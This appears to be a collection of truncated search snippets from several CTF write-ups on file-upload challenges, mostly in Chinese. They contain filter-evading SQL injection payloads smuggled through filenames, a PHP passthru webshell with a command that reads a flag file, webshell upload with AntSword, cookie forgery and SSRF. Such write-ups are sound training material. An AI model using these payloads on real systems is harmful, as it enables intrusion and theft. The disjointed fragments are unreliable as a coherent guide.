所以才用到了CONV,将16进制转化为10进制,读取出来的数据都是十进制的,先转换成十六进制然后转换为字符 即查出库名:web_upload 查表 这里表名比较长,所以我们分三次读取 '+(seleselectct+conv(substr(hex((selselectect table_name frfromom information_schema.tables where table_schema='web_upload' limit 1,...
注入表名:'+(seleselectct+conv(substr(hex((selselectect table_name frfromom information_schema.tables where table_schema = 'web_upload' limit 1,1)),1,12),16,10))+'.jpg# 得到表名 hello_flag_is_here 注入字段: '+(seleselectct+conv(substr(hex((selselectect COLUMN_NAME frfromom informat...
禁用js之后上传成功 用蚁剑连上就可以找到flag upload我推荐去ctfhub学,里面相对全一点,当然upload-lab也可以(github上有) 顺道推一下我在ctfhub上的upload的write up,里面的方法可以直接学 __EOF__
XCTF upload1 一.根据题目应该感觉和文件上传有关 1.进入实验环境,发现果然是一个文件上传的表单。 2.尝试把事先写好的一句话木马文件上传上去,但上传失败,提示只能上传图片, 那我们就看看这个限制是在前端做的,还是后端做的,通过f12开发者根据, 选取页面中上传按钮的那个元素,可以发现点击后会通过js中的函数进行...
首先经过几番尝试后发现可以在首页的改密码处抓包,发现传值包括username与password。那么把username改为admin就可以用自己改好的密码登录进去了。进去后一无所获,然后发现提示ip不匹配,于是老套路改xff头尾127.0.0.1。 从返回源码处发现提示要改do参数,这里正确答案是令do=upload。不过我也不知道为什么要upload?zhiji...
同理获得upload.php 的源码 <?php $error=$_FILES['pic']['error']; $tmpName=$_FILES['pic']['tmp_name']; $name=$_FILES['pic']['name']; $size=$_FILES['pic']['size']; $type=$_FILES['pic']['type']; try{ if($name
(3)真实上传目录为upload 5.构建exp为file=…/123.php/1.php/…&con=<?php passthru($_GET[bash]);?>,用post方式进行传递 6.访问http://111.198.29.45:38479/uploaded/123.php?bash=cat …/flag.php,查看源码,获得flag,如图所示 (2) 对源码进行审计 ...
题目主要源码如下 from flask import Flask, render_template, request, render_template_string,redirect from verify import * from User import User import base64 from waf import waf app = Flask(__name__,static_folder="static",template_folder="templates") ...
在使用admin_upload.php写shell之前,有权限校验,可使用从数据库中注出的数据,按源码的验证逻辑构造出cookie,拿到admin权限。 cookie构造逻辑在kss_inc/db_function.php line 300。 有两个k-v需要构造,下图红框部分为注入跑出来的数据,蓝框部分从源码配置文件里拿到: webshell写入 回到最开始提到的从远程服务器更新...
The challenge provide an input box and a radio box, and it will send a HTTP GET request to http://35.241.245.36/api/v1/upload?url=http://your_url&method=get like this, and it will return an image name, and the result of the SSRF will store under http://35.241.245.36/images/ The...